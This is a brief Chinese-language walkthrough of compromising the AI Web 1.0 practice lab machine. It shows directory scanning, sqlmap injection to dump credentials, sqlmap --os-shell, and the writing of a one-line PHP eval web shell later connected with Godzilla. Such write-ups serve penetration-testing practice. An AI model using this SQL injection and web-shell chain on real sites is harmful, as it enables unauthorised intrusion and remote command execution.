1、启动靶机

2、打开御剑，扫描端口，得到AI Web 1.0靶机IP

3、扫描目录

4、查看192.168.253.128/robots.txt

5、进一步扫描

/m3diNf0/

6、查看192.168.253.128/m3diNf0/info.php

8、扫描se3reTdir777，发现index.php

9、开始抓包

10、将抓到的包放到2.txt中，使用sqlmap进行sql注入

得到库名

得到表名

得到列名

再看userName和password

11、由info.php得知绝对路径，以此运行--os-shell来远程访问

python3 sqlmap.py -r 2.txt的路径 --os-shell

12、输入绝对路径/home/www/html/web1x443290o2sdf92213/se3reTdir777/uplo
ads/

13、上传一句话木马

echo "<?php @eval(\$_POST[cmd]);?>" >1.php

 14、用哥斯拉成功连接到木马